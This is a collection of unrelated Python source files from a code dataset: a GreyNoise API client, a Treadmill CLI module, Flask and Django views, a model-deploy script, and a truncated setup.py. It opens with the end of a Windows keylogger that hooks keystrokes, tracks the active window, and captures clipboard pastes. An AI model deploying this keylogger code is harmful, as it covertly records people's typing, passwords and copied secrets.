create_string_buffer(b\"\\x00\"*512)\n length = user32.GetWindowTextA(hwnd, byref(windows_title), 512)\n\n # Print the result\n print(\"[ PID:%s-%s-%s]\" % (process_id,executable.value,windows_title.value))\n\n # Close handles\n kernel32.CloseHandle(hwnd)\n kernel32.CloseHandle(h_process)\n\n\ndef KeyStroke(event):\n global current_window\n\n # Detect whether focus moved to a new window (if so, log the new one)\n if event.WindowName != current_window:\n current_window = event.WindowName\n # Report the new foreground process\n get_current_process()\n\n # Check whether the keystroke is a regular printable key (not a combo key)\n if event.Ascii > 32 and event.Ascii < 127:\n print(chr(event.Ascii))\n else:\n # On a paste event, record the clipboard contents\n if event.Key == \"V\":\n win32clipboard.OpenClipboard()\n pasted_value = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n print(\"[PASTE]-%s\" % (pasted_value))\n else:\n print(\"[%s]\" % event.Key)\n return True\n\n# Create and register the hook manager\nkl = pyHook3.HookManager()\nkl.KeyDown = KeyStroke\n\n# Install the keyboard hook and pump messages\nkl.HookKeyboard()\npythoncom.PumpMessages()","sub_path":"hacker/python/键盘记录器.py","file_name":"键盘记录器.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"140672","text":"#!/usr/bin/env python\n\"\"\"Abstract API over the GreyNoise API.\"\"\"\nimport csv\nimport dict2xml\nimport json\nimport logging\nimport os\nimport pydoc\nimport re\nimport requests\nimport sys\nimport time\n\n__author__ = \"GreyNoise Intelligence\"\n__copyright__ = \"Copyright, GreyNoise\"\n__credits__ = [\"GreyNoise Intelligence\"]\n__license__ = \"MIT\"\n__maintainer__ = \"GreyNoise Intelligence\"\n__email__ = \"hello@greynoise.io\"\n__status__ = \"BETA\"\n\nclass RequestFailure(Exception):\n \"\"\"Exception to capture a failed request.\"\"\"\n pass\n\n\nclass InvalidResponse(Exception):\n \"\"\"Exception to capture a failed response parse.\"\"\"\n pass\n\n\ndef valid_date(date):\n \"\"\"Check the input date and ensure it matches the format.\"\"\"\n import datetime\n try:\n datetime.datetime.strptime(date, '%Y-%m-%d')\n except ValueError:\n raise ValueError(\"Incorrect data format, should be YYYY-MM-DD\")\n\n\ndef valid_ip(ip_address, strict=True):\n \"\"\"Check if the IP address is valid.\"\"\"\n import socket\n try:\n 
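 # Note: inet_aton also accepts legacy short forms such as '127.1'. A\n # stricter alternative (sketch, standard-library ipaddress module):\n # import ipaddress\n # ipaddress.ip_address(ip_address) # raises ValueError on bad input\n 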
socket.inet_aton(ip_address)\n return True\n except socket.error:\n if strict:\n raise ValueError(\"Invalid IP address\")\n return False\n\n\n\nclass GNUtils:\n CONFIG_PATH = os.path.expanduser('~/.config/greynoise')\n CONFIG_FILE = os.path.join(CONFIG_PATH, 'config.json')\n CONFIG_DEFAULTS = {'api_key': ''}\n\n def setup():\n # Called when <-k or --api-key + some argument> used.\n # TODO: key verification using ping endpoint \n # Auto-check at some interval? Configurable?\n # If query is run w/o valid credentials, it will be unsuccessful - speaks for itself\n\n if len(sys.argv) >= 4 and (sys.argv[2] == \"-k\" or sys.argv[2] == \"--api-key\"):\n print(\" Generating config.json...\\n\")\n if not os.path.isfile(GNUtils.CONFIG_FILE):\n if not os.path.exists(GNUtils.CONFIG_PATH):\n os.makedirs(GNUtils.CONFIG_PATH)\n config = GNUtils.CONFIG_DEFAULTS\n config['api_key'] = sys.argv[3] # wip\n with open(GNUtils.CONFIG_FILE, 'w') as file:\n json.dump(config, file, indent=4, separators=(',', ': '))\n # TODO: Test if running this overwrites or appends. It needs to overwrite.\n print(\" Success!\\n ~/.config/greynoise/config.json file generated.\\n\")\n exit()\n else: # If you are w/o the above things, there's a mistake\n print(\" Setup requires an API key.\\n Usage: greynoise setup -k \")\n exit()\n\n\n # Parse json from config file, return api key to caller\n def load_config():\n # test for existence of file again before actually executing\n if os.path.isfile(GNUtils.CONFIG_FILE):\n config = json.load(open(GNUtils.CONFIG_FILE))\n if \"api_key\" in config:\n # print(config['api_key'])\n return config['api_key']#.encode('utf-8')\n else:\n return ''\n print(\" API key not found.\\n\")\n exit()\n\n # Turns input file into a python list\n def listFile(listFile):\n try:\n with open(listFile) as f:\n ipList = []\n inputFile = f.readlines()\n for i in inputFile: \n i = i.split(\"\\n\")[0]\n ipList.append(i)\n return ipList\n except:\n return None\n\n\n\n\nclass GNCli:\n banner = \"\"\"\\n _____________ ______________ \n __ ____/__ | / /_ __ \\__ / \n _ / __ __ |/ /_ / / /_ / \n / /_/ / _ /| / / /_/ /_ /___\n \\____/ /_/ |_/ \\___\\_\\/_____/\n \"\"\"\n\n # Will be loaded\n GREYNOISE_API_KEY = GNUtils.load_config() # this is working\n\n ### global variables ########################################################################\n # For output\n contextFields = { \"ip\": \"IP\", \"classification\": \"Classification\", \"first_seen\": \"First seen\",\n \"last_seen\": \"Last seen\", \"actor\": \"Actor\", \"tags\": \"Tags\" }\n metadataFields = { \"organization\": \"Organization\", \"rdns\": \"rDNS\", \"asn\": \"ASN\", \"tor\": \"Tor\",\n \"os\": \"OS\", \"category\": \"Category\" }\n\n # constraints for inputre.\n flags = [\"-f\", \"--file\", \"-o\", \"--output\", \"-q\", \"--query\", \"-t\", \"--type\", \"-v\", \"--verbose\"]\n flags_meta = [\"-h\", \"--help\"]\n formatTypes = [\"txt\", \"csv\", \"xml\", \"json\", \"raw\"] # constraints for -o\n queryTypes = [\"quick\", \"raw\", \"context\", \"multi\", \"bulk\", \"date\", \"actors\"] # constraints for -t\n\n #############################################################################################\n\n # TODO: formatting.py - make functions, call the right one in each case\n # Could even call a text output handler function in formatting.py right from runQuery\n # that then passes control around amongst smaller functions - the stuff happening in these\n # logic branches could be functions.\n\n\n # TODO: refactor, individual functions? this is long... 
+ name is inaccurate - not all queries are IPs\n def txtIP(results,verboseOut):\n try:\n if \"error\" in results:\n print(\" Error: %s\" % results[\"error\"]) \n # quick scan fields\n elif \"noise\" in results:\n if results[\"noise\"]:\n print(\" %s is classified as NOISE.\" % results[\"ip\"])\n elif not results[\"noise\"]:\n print(\" %s is classified as NOT NOISE.\" % results[\"ip\"])\n # context/gnql fields - called for each result in the list when used with multi-searches\n elif \"seen\" in results or \"count\" in results:\n if results[\"seen\"] or (\"count\" in results and results[\"count\"] > 0):\n print(\" \"*10+\"OVERVIEW:\")\n print(\" \"+\"-\"*28)\n for field in GNCli.contextFields:\n print(\" %s: %s\" % (GNCli.contextFields[field], results[field]))\n print()\n print(\" \"*10+\"METADATA:\")\n print(\" \"+\"-\"*28)\n # Complete location info is not always available, so concatenate whatever info there is.\n if results[\"metadata\"][\"city\"]:\n city = \"%s, \" % results[\"metadata\"][\"city\"]\n else:\n city = \"\"\n if results[\"metadata\"][\"country\"]:\n country = results[\"metadata\"][\"country\"]\n else:\n country = \"Unknown Country\"\n if results[\"metadata\"][\"country_code\"]:\n country_code = \" (%s)\" % results[\"metadata\"][\"country_code\"]\n else:\n country_code = \"\"\n print(\" Location: %s%s%s\" % (city, country, country_code))\n # the rest of the metadata can be looped thru\n for field in GNCli.metadataFields:\n try:\n if results[\"metadata\"][field]:\n if field == \"tor\": # the only non string..\n print(\" Tor: %b\" % results[\"metadata\"][field])\n elif results[\"metadata\"][field]:\n print(\" %s: %s\" % (GNCli.metadataFields[field], results[\"metadata\"][field]))\n except:\n continue\n print()\n print(\" \"*10+\"RAW DATA:\")\n print(\" \"+\"-\"*28)\n if results[\"raw_data\"][\"scan\"]:\n if (len(results[\"raw_data\"][\"scan\"]) < 20) or verboseOut:\n for item in results[\"raw_data\"][\"scan\"]:\n try:\n print(\" Port/Proto: %s/%s\" % (item[\"port\"],item[\"protocol\"]))\n except:\n continue\n else:\n counter = 0\n for item in results[\"raw_data\"][\"scan\"]:\n try:\n print(\" Port/Proto: %s/%s\" % (item[\"port\"],item[\"protocol\"]))\n counter += 1\n if counter == 20:\n break # can make this nicer\n except:\n continue\n print(\" Showing results 1 - 20 of %s. Run again with -v for full output.\" % len(results[\"raw_data\"][\"scan\"]))\n if results[\"raw_data\"][\"web\"]:\n print()\n print(\" [Paths]\")\n if not results[\"raw_data\"][\"web\"][\"paths\"]:\n print(\" None found.\")\n else:\n if (len(results[\"raw_data\"][\"web\"][\"paths\"]) < 20) or verboseOut:\n for path in results[\"raw_data\"][\"web\"][\"paths\"]:\n try:\n print(\" %s\" % path)\n except:\n continue\n else:\n for index in range(20):\n try:\n print (\" %s\" % results[\"raw_data\"][\"web\"][\"paths\"][index])\n except:\n continue\n print(\" Showing results 1 - 20 of %s. 
Run again with -v for full output.\" % len(results[\"raw_data\"][\"web\"][\"paths\"]))\n if results[\"raw_data\"][\"ja3\"]:\n print(\"[JA3]\")\n if not results[\"raw_data\"][\"ja3\"]:\n print(\"None found.\")\n else:\n for i in results[\"raw_data\"][\"ja3\"]:\n try:\n print(\" Port: %s Fingerprint: %s\"%(i[\"port\"],i[\"fingerprint\"]))\n except:\n continue\n print() \n else:\n print(\"%s has not been seen in scans in the past 30 days.\" % results[\"ip\"])\n except Exception as e:\n print(\"Error converting output!\")\n print(e)\n\n # -o txt\n def makeTxt(results, type, verboseOut):\n try:\n if type == \"bulk\" or type == \"date\":\n formatted = \"\"\n maxcount = 6 # IPs per line - TODO: allow user to set\n count = 0\n # Concatenate IPs into a string of readable columns, variable width\n for ip in results[\"noise_ips\"]:\n if count == 0:\n ip = ' ' + ip # adds spacing to the left of the first IP printed on each line.\n formatted = formatted + (ip+' '*(18-len(ip)))\n count += 1\n if count == maxcount:\n count = 0\n formatted = formatted + \"\\n\"\n # result is paginated\n return pydoc.pager(formatted)\n if type == \"quick\" or type == \"context\":\n GNCli.txtIP(results, verboseOut)\n if type == \"raw\" or not type:\n if \"data\" in results:\n counter = 1\n for entry in results[\"data\"]:\n heading = (\"result %i of %i\" % (counter, len(results[\"data\"])))\n # total number of spaces needed for padding\n spacing = (27 - len(heading))\n # if odd number, extra space should go in front.\n if (27 - len(heading)) % 2 != 0:\n leading_spaces = int((spacing + 1) / 2)\n trailing_spaces = leading_spaces - 1\n heading = \" \"*(leading_spaces) + heading + \" \"*trailing_spaces\n else:\n heading = \" \"*int(spacing/2) + heading + \" \"*int(spacing/2)\n # print title bar for each numbered result (doesnt work well in some environments)\n print((\" ┌───────────────────────────┐\\n │%s│\\n └───────────────────────────┘\") % heading)\n print()\n GNCli.txtIP(entry, verboseOut)\n print()\n print()\n counter+= 1\n else:\n print(\" No results found.\")\n except Exception as e:\n print(\" Error making text output!\")\n print(e)\n\n # TODO: Clean up the lists and flatten within each cell. Handling for other query types? Usage?\n def makeCSV(results, of, type):\n try:\n if type != \"raw\":\n print(\" Output to .csv not available for this query type at this time.\")\n exit()\n else:\n if \"data\" in results:\n scanData = results[\"data\"]\n else:\n print(\" No data to write.\")\n exit()\n scanCSV = open(of, 'w') \n csvwriter = csv.writer(scanCSV)\n count = 0\n for o in scanData:\n if count == 0:\n header = o.keys()\n csvwriter.writerow(header)\n count += 1\n csvwriter.writerow(o.values())\n scanCSV.close()\n print(\" Output to file: %s\" % of)\n except Exception as e:\n print(\" Error converting to CSV!\")\n print(e)\n\n\n ##############################################################################################\n # Making requests\n # TODO: request.py \n\n # TODO: Request handler function that pares some of this insanity down\n\n\n # Handling for single-IP requests. 
TODO: Name is inaccurate now - not all queries are IPs\n def singleIP(query, type):\n try:\n url = \"https://research.api.greynoise.io/v2/\" \n if type == \"raw\" or not type:\n r = requests.get(url+\"experimental/gnql\", params={\"query\": query}, headers={\"key\": GNCli.GREYNOISE_API_KEY})\n return r.text.encode(\"utf-8\")\n elif type == \"quick\" or type == \"context\":\n url += \"noise/\" + type + \"/\" + query\n r = requests.get(url, headers={\"key\": GNCli.GREYNOISE_API_KEY})\n r2 = json.loads(r.text)\n if \"error\" in r2:\n if r2[\"error\"] == \"invalid ip\": \n print(\" Please enter a valid IP address.\")\n return(False)\n elif r2[\"error\"] == \"commonly spoofed ip\":\n print(\" Provided IP address is commonly spoofed.\")\n return False\n else:\n print(\" Error - %s\" % r2[\"error\"])\n return False \n return r.text.encode(\"utf-8\")\n except Exception as e:\n print(\" Error making request for single IP!\")\n print(e)\n\n\n\n # TODO: handling for file input... invalid/couldnt read, etc\n # TODO: log parser output directly as input for multi query. Come back to this - endpoint busted\n def multiQuery(inputFile):\n try:\n if inputFile:\n ipList = GNUtils.listFile(inputFile)\n rr = {\"ips\": ipList}\n query = json.dumps(rr)\n r = requests.get(\"https://research.api.greynoise.io/v2/noise/multi/quick\",\n data=query, headers={\"key\": GNCli.GREYNOISE_API_KEY})\n return r.text.encode(\"utf-8\")\n else:\n print(\"Invalid input file.\")\n exit()\n except Exception as e:\n print(\" Error making request!\")\n print(e) \n\n def bulkQuery(date=False):\n try:\n if date: # If there's an actual date given, run the date-specific bulk search\n # Restricts input to \"real\" dates\n matchDateFormat = re.fullmatch('2\\d\\d\\d-((0[1-9])|(1[0-2]))-((0[1-9])|(1[0-9])|(2[0-9])|(3[0-1]))', date)\n if not matchDateFormat:\n print(\"Error: Query needs to be a date in YYYY-MM-DD format.\")\n exit()\n r = requests.get(\"https://research.api.greynoise.io/v2/noise/bulk/\"+date,\n headers={\"key\": GNCli.GREYNOISE_API_KEY})\n else: # today\n r = requests.get(\"https://research.api.greynoise.io/v2/noise/bulk\",\n headers={\"key\": GNCli.GREYNOISE_API_KEY})\n # enables access to fields\n r2 = json.loads(r.content.decode(\"utf-8\"))\n # If there are no responses, and the end is reached, the log is empty\n if not \"noise_ips\" in r2 and \"complete\" in r2:\n print(\" No IPs found to be generating noise for the given date.\")\n return False\n return r.text.encode(\"utf-8\")\n except Exception as e:\n print(\" Error making request!\")\n print(e)\n\n def actors(): # clarify\n try:\n r = requests.get(\"https://research.api.greynoise.io/v2/research/actors\",\n headers={\"key\": GNCli.GREYNOISE_API_KEY})\n return r.text.encode(\"utf-8\")\n except Exception as e:\n print(\" Error making request!\")\n print(e)\n\n # TODO: write to file with txt formatted output\n def writeToFile(contents):\n if outFile:\n try:\n f = open(outFile, \"w\")\n f.write(str(contents))\n f.close()\n print(\" Output written to file \\\"%s\\\".\" % outFile)\n except:\n print(\" Error accessing output file.\")\n\n \n\n ### Ensure query is valid ~ #################################################################\n def test_query(rQuery,queryType,outFormat):\n\n # If queryType is defined, but its value is not in types, it is not allowed\n if queryType and queryType not in GNCli.queryTypes:\n print(\" Query type unrecognized.\")\n print(\" Accepted query types: quick, raw, context, multi, bulk, date, actors\")\n exit()\n # only these formats\n if 
outFormat and outFormat not in GNCli.formatTypes:\n print(\" Invalid output format. Options are text, csv, xml, json, raw (default)\")\n exit()\n # If queryType is one of the following, rQuery must be defined - the search requires a query.\n if not rQuery:\n if queryType == \"quick\" or queryType == \"context\" or queryType == \"raw\" or not queryType:\n print(\" Please enter a query.\")\n exit()\n elif queryType == \"date\": #bulkdate\n print(\" Please enter a date (-q YYYY-MM-DD).\")\n exit()\n\n\n\n\n\n ### Main Application Logic #####################################################\n # TODO: refactor? \n def runQuery(outFile,outFormat,queryType,rQuery,verboseOut):\n try:\n \n GNCli.test_query(rQuery,queryType,outFormat) # Will lead to program exit if any issues found.\n\n # TODO: controller for this decision making.\n if rQuery:\n cQuery = re.sub(\"[/]+\", \"\\\\/\", rQuery) # Escaping backslashes\n else:\n cQuery = False\n if queryType == \"context\" or queryType == \"quick\" or queryType == \"raw\" or not queryType:\n result = GNCli.singleIP(cQuery, queryType)\n elif queryType == \"multi\":\n result = GNCli.multiQuery(cQuery) # takes a list of ips\n elif queryType == \"bulk\":\n result = GNCli.bulkQuery() # defaults to today's date\n elif queryType == \"date\":\n result = GNCli.bulkQuery(cQuery) # param is a date YYYY-MM-DD\n elif queryType == \"actors\":\n result = GNCli.actors()\n # you can handle special cases for anything by returning False to runQuery. \n if result:\n jResult = json.loads(result.decode('utf-8'))\n else:\n jResult = False\n\n # TODO: formatting.py as described above - encapsulate the following\n if outFormat == \"xml\":\n if jResult:\n if outFile:\n GNCli.writeToFile(dict2xml.dict2xml(jResult))\n else:\n print(dict2xml.dict2xml(jResult))\n elif outFormat == \"txt\":\n if jResult:\n if queryType != \"quick\":\n print(GNCli.banner)\n GNCli.makeTxt(jResult, queryType, verboseOut)\n elif outFormat == \"csv\":\n if outFile:\n of = outFile\n else: # Timestamped file name generated if none is given\n of = \"greynoise-\" + time.strftime(\"%Y%m%d-%H%M%S\") + \".csv\" \n if jResult:\n GNCli.makeCSV(jResult,of,queryType)\n elif outFormat == \"json\":\n if jResult:\n print(json.dumps(jResult))\n elif not outFormat or outFormat == \"raw\":\n if jResult:\n if outFile:\n GNCli.writeToFile(jResult)\n else:\n print(jResult) # Print raw if nothing specified # TODO: add default\n except Exception as e: \n print(\" General Error! 
%s\" % e)\n # TODO: error handling for API key\n \n\n\nclass GreyNoise:\n\n \"\"\"Abstract interface for GreyNoise.\"\"\"\n\n NAME = \"GreyNoise\"\n LOG_LEVEL = logging.INFO\n BASE_URL = \"https://enterprise.api.greynoise.io\"\n CLIENT_VERSION = 1\n API_VERSION = \"v2\"\n EP_NOISE_BULK = \"noise/bulk\"\n EP_NOISE_BULK_DATE = \"noise/bulk/{date}\"\n EP_NOISE_QUICK = \"noise/quick/{ip_address}\"\n EP_NOISE_MULTI = \"noise/multi/quick\"\n EP_NOISE_CONTEXT = \"noise/context/{ip_address}\"\n CODE_CONST = {\n '0x00': 'IP has never been observed scanning the Internet',\n '0x01': 'IP has been observed by the GreyNoise sensor network',\n '0x02': 'IP has been observed scanning the GreyNoise sensor network, but has not completed a full connection, meaning this can be spoofed',\n '0x03': 'IP is adjacent to another host that has been directly observed by the GreyNoise sensor network',\n '0x04': 'RESERVED',\n '0x05': 'IP is commonly spoofed in Internet-scan activity',\n '0x06': 'IP has been observed as noise, but this host belongs to a cloud provider where IPs can be cycled frequently',\n '0x07': 'IP is invalid',\n '0x08': 'IP was classified as noise, but has not been observed engaging in Internet-wide scans or attacks in over 60 days'\n }\n\n def __init__(self, api_key):\n \"\"\"Init the object.\"\"\"\n self._log = self._logger()\n self.api_key = api_key\n\n def _logger(self):\n \"\"\"Create a logger to be used between processes.\n\n :returns: Logging instance.\n \"\"\"\n logger = logging.getLogger(self.NAME)\n logger.setLevel(self.LOG_LEVEL)\n shandler = logging.StreamHandler(sys.stdout)\n fmt = '\\033[1;32m%(levelname)-5s %(module)s:%(funcName)s():'\n fmt += '%(lineno)d %(asctime)s\\033[0m| %(message)s'\n shandler.setFormatter(logging.Formatter(fmt))\n logger.addHandler(shandler)\n return logger\n\n def set_log_level(self, level):\n \"\"\"Set the log level.\"\"\"\n if level == 'info':\n level = logging.INFO\n if level == 'debug':\n level = logging.DEBUG\n if level == 'error':\n level = logging.ERROR\n self._log.setLevel(level)\n\n def _request(self, endpoint, params=dict(), data=None):\n \"\"\"Handle the requesting of information from the API.\"\"\"\n GNClient_value = \"pyGreyNoise v%s\" % (str(self.CLIENT_VERSION))\n headers = {'X-Request-Client': GNClient_value, 'key': self.api_key}\n url = '/'.join([self.BASE_URL, self.API_VERSION, endpoint])\n self._log.debug('Requesting: %s', url)\n response = requests.get(url, headers=headers, timeout=7, params=params,\n data=data)\n if response.status_code not in range(200, 299):\n raise RequestFailure(response.status_code, response.content)\n try:\n loaded = json.loads(response.content)\n except Exception as error:\n raise InvalidResponse(error)\n return loaded\n\n def _recurse(self, config, breaker=False):\n # accumulate each page's values, recursing until the API reports the\n # dump is complete\n if breaker:\n return config['results']\n kwargs = {'endpoint': config['endpoint'], 'params': config['params']}\n response = self._request(**kwargs)\n config['results'].extend(response.get(config['data_key'], []))\n return self._recurse(config, response.get('complete', True))\n\n def get_noise(self, date=None, recurse=True):\n \"\"\"Get a complete dump of noisy IPs associated with Internet scans.\n\n Get all noise IPs generated by Internet scanners, search engines, and\n worms. 
Users will get all values or can specify a date filter for just\n a single day.\n\n :param date: Optional date to use as a filter.\n :type date: str\n :param recurse: Recurse through all results.\n :type recurse: bool\n :return: List of IP addresses associated with scans.\n :rtype: list\n \"\"\"\n results = dict()\n endpoint = self.EP_NOISE_BULK\n if date:\n _ = valid_date(date)\n endpoint = self.EP_NOISE_BULK_DATE.format(date=date)\n\n if recurse:\n config = {'endpoint': endpoint, 'params': dict(),\n 'results': list(), 'data_key': 'noise_ips'}\n results = self._recurse(config)\n return results\n\n response = self._request(endpoint)\n results['results'] = list(set(response['noise_ips']))\n results['result_count'] = len(results['results'])\n return results\n\n def get_noise_status(self, ip_address):\n \"\"\"Get activity associated with an IP address.\n\n :param ip_address: IP address to use in the look-up.\n :type ip_address: str\n :return: Activity metadata for the IP address.\n :rtype: dict\n \"\"\"\n results = dict()\n _ = valid_ip(ip_address)\n endpoint = self.EP_NOISE_QUICK.format(ip_address=ip_address)\n response = self._request(endpoint)\n if response.get('code') not in self.CODE_CONST:\n response['code_message'] = \"Code message unknown: %s\" % (response.get('code'))\n else:\n response['code_message'] = self.CODE_CONST[response.get('code')]\n results['results'] = response\n return results\n\n def get_noise_status_bulk(self, ip_addresses):\n \"\"\"Get activity associated with multiple IP addresses.\n\n :param ip_addresses: IP addresses to use in the look-up.\n :type ip_addresses: list\n :return: Bulk status information for IP addresses.\n :rtype: dict\n \"\"\"\n results = dict()\n if not isinstance(ip_addresses, list):\n raise ValueError(\"`ip_addresses` must be a list\")\n ip_addresses = [x for x in ip_addresses if valid_ip(x, strict=False)]\n data = json.dumps({'ips': ip_addresses})\n response = self._request(self.EP_NOISE_MULTI, params=dict(), data=data)\n for idx, result in enumerate(response):\n if result.get('code') not in self.CODE_CONST:\n response[idx]['code_message'] = \"Code message unknown: %s\" % (result.get('code'))\n else:\n response[idx]['code_message'] = self.CODE_CONST[result.get('code')]\n results['results'] = response\n results['result_count'] = len(results['results'])\n return results\n\n def get_context(self, ip_address):\n \"\"\"Get context associated with an IP address.\n\n :param ip_address: IP address to use in the look-up.\n :type ip_address: str\n :return: Context for the IP address.\n :rtype: dict\n \"\"\"\n results = dict()\n _ = valid_ip(ip_address)\n endpoint = self.EP_NOISE_CONTEXT.format(ip_address=ip_address)\n response = self._request(endpoint)\n results['results'] = response\n return results\n","sub_path":"greynoise/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":29079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"253066589","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/treadmill/cli/monitor.py\n# Compiled at: 2017-04-03 02:32:49\n# Size of source mod 2**32: 2459 bytes\n\"\"\"Treadmill Application monitor CLI\n\nCreate, delete and manage app monitors.\n\"\"\"\nimport logging, click\nfrom treadmill import cli\nfrom treadmill import context\nfrom treadmill import restclient\n_LOGGER = 
logging.getLogger(__name__)\n_EXCEPTIONS = []\n_EXCEPTIONS.extend(cli.REST_EXCEPTIONS)\n_ON_EXCEPTIONS = cli.handle_exceptions(_EXCEPTIONS)\n_REST_PATH = '/app-monitor/'\n\ndef init():\n \"\"\"Configures application monitor\"\"\"\n formatter = cli.make_formatter(cli.AppMonitorPrettyFormatter)\n ctx = {}\n\n @click.group()\n @click.option('--cell', required=True, envvar='TREADMILL_CELL', callback=cli.handle_context_opt, expose_value=False)\n @click.option('--api', help='API url to use.', metavar='URL', envvar='TREADMILL_RESTAPI')\n def monitor_group(api):\n \"\"\"Manage Treadmill app monitor configuration\"\"\"\n ctx['api'] = api\n\n @monitor_group.command()\n @click.option('-n', '--count', type=int, help='Instance count')\n @click.argument('name')\n @_ON_EXCEPTIONS\n def configure(count, name):\n \"\"\"Configure application monitor\"\"\"\n restapi = context.GLOBAL.cell_api(ctx['api'])\n url = _REST_PATH + name\n if count is not None:\n data = {'count': count}\n try:\n _LOGGER.debug('Creating app monitor: %s', name)\n restclient.post(restapi, url, payload=data)\n except restclient.AlreadyExistsError:\n _LOGGER.debug('Updating app monitor: %s', name)\n restclient.put(restapi, url, payload=data)\n\n _LOGGER.debug('Retrieving app monitor: %s', name)\n monitor_entry = restclient.get(restapi, url)\n cli.out(formatter(monitor_entry.json()))\n\n @monitor_group.command(name='list')\n @_ON_EXCEPTIONS\n def _list():\n \"\"\"List configured app monitors\"\"\"\n restapi = context.GLOBAL.cell_api(ctx['api'])\n response = restclient.get(restapi, _REST_PATH)\n cli.out(formatter(response.json()))\n\n @monitor_group.command()\n @click.argument('name', nargs=1, required=True)\n @_ON_EXCEPTIONS\n def delete(name):\n \"\"\"Delete app monitor\"\"\"\n restapi = context.GLOBAL.cell_api(ctx['api'])\n url = _REST_PATH + name\n restclient.delete(restapi, url)\n\n del delete\n del _list\n del configure\n return monitor_group","sub_path":"pycfiles/Treadmill-0.0.2-py3.4/monitor.cpython-34.py","file_name":"monitor.cpython-34.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"243212709","text":"from app import db\nfrom flask import Response\n\nfrom datetime import datetime\n\nfrom app.models import *\n\nfrom . 
import populate\n\n@populate.route('/popula')\ndef popula():\n roles = ['Admin', 'Moderator', 'User']\n role_query = Role.query.all()\n\n if str(role_query) == '[]':\n for role in roles:\n populate_role = Role(\n role_name=role\n )\n db.session.add(populate_role)\n \n populate_user = User(\n username='luis.carvalho',\n name='Luis Fernando Carvalho',\n email='luis@admin.com',\n password='admin123',\n role_id=1\n )\n db.session.add(populate_user)\n \n populate_event = Event(\n title='Campeonato para Bronzes',\n description='Campeonato de League of Legends',\n date_event='20/06/2019',\n created_at=datetime.today().strftime('%d/%m/%Y %H:%M'),\n last_updated=datetime.today().strftime('%H:%M'),\n )\n db.session.add(populate_event)\n\n populate_event2 = Event(\n title='Campeonato para Ouros',\n description='Campeonato de League of Legends',\n date_event='30/07/2019',\n created_at=datetime.today().strftime('%d/%m/%Y %H:%M'),\n last_updated=datetime.today().strftime('%H:%M')\n )\n db.session.add(populate_event2)\n\n populate_event3 = Event(\n title='Campeonato para Hackers',\n description='Campeonato de programação voltado para pentest',\n date_event='12/07/2019',\n created_at=datetime.today().strftime('%d/%m/%Y %H:%M'),\n last_updated=datetime.today().strftime('%H:%M')\n )\n db.session.add(populate_event3)\n\n populate_event4 = Event(\n title='Campeonato para Desenvolvedores Web',\n description='Campeonato voltado para desenvolvedores web com foco em \\\n responsividade e melhor desempenho',\n date_event='20/08/2019',\n created_at=datetime.today().strftime('%d/%m/%Y %H:%M'),\n last_updated=datetime.today().strftime('%H:%M')\n )\n db.session.add(populate_event4)\n db.session.commit()\n\n return \"\"\"\n
Tabelas populadas:\n Roles\n Users\n Events\n Index\n \"\"\"\n\n else:\n return \"\"\"\n Base já populada!
\n Index \n \"\"\"","sub_path":"app/populate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297573488","text":"from time import time\nfrom django.shortcuts import render\nfrom django.views.generic import View\n\nfrom .forms import DisplayForm\n\n\nclass FibonacciSeries(View):\n\n template_name = 'fibonacci/index.html'\n\n def get(self, request, *args, **kwargs):\n\n form = DisplayForm()\n return render(request, self.template_name, {'form': form})\n\n def post(self, request, *args, **kwargs):\n start_time = time()\n form = DisplayForm(request.POST)\n errors = ''\n current_number = ''\n result = ''\n\n if form.is_valid():\n current_number = form.cleaned_data.get('number')\n if current_number == 1:\n result = 1\n else:\n result = fib(current_number)\n else:\n errors = form.errors\n\n end_time = time() - start_time\n\n template_values = {\n 'errors': errors,\n 'time': end_time,\n 'current_number': current_number,\n 'result': result\n }\n return render(request, self.template_name, template_values)\n\n\ndef fib(n):\n current = 1\n old = 0\n i = 1\n while i < n:\n current, old, i = current + old, current, i+1\n return current\n","sub_path":"sample_app/fibonacci/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509864111","text":"import promote\nimport h2o\nimport os\n\nh2o.init()\n\nmodel_path = os.path.abspath('./objects/DRF_model_python_1524085511585_1')\nmodel = h2o.load_model(model_path)\n\ndef helloh2o(data):\n # first transfrom our JSON into an H2OFrame\n h2o_data = h2o.H2OFrame(data)\n # Predict!\n res = model.predict(h2o_data).as_data_frame().to_dict()\n return {'response': res}\n\nUSERNAME = 'ross'\nAPI_KEY = 'your_api_key'\nPROMOTE_URL = \"https://promote.c.yhat.com/\"\n\n\np = promote.Promote(USERNAME, API_KEY, PROMOTE_URL)\n\n# add metadata\np.metadata.logloss = float(\"{0:.5f}\".format(model.logloss()))\n\n# test data\nTESTDATA = {\"C1\":4.9,\"C2\":3,\"C3\":1.4,\"C4\":0.2}\n\n# test model locally\nprint(helloh2o(TESTDATA))\n\n# test that TESTDATA is valid json\np.deploy(\"helloh2o\", helloh2o, TESTDATA, confirm=True, dry_run=False, verbose=1)","sub_path":"examples/h2o-classifier/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433889798","text":"import pypandoc\nimport setuptools\n\nlong_description = pypandoc.convert_file(\"../README.org\", \"md\")\n\nsetuptools.setup(\n name=\"bridge-sim-barischrooneyj\", # Replace with your own username\n version=\"0.0.5\",\n author=\"Jeremy Barisch-Rooney\",\n author_email=\"barischrooneyj@protonmail.com\",\n description=\"A Python library for concrete slab bridge simulation.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/barischrooneyj/bridge-sim\",\n packages=setuptools.find_packages(),\n classifiers=[\n 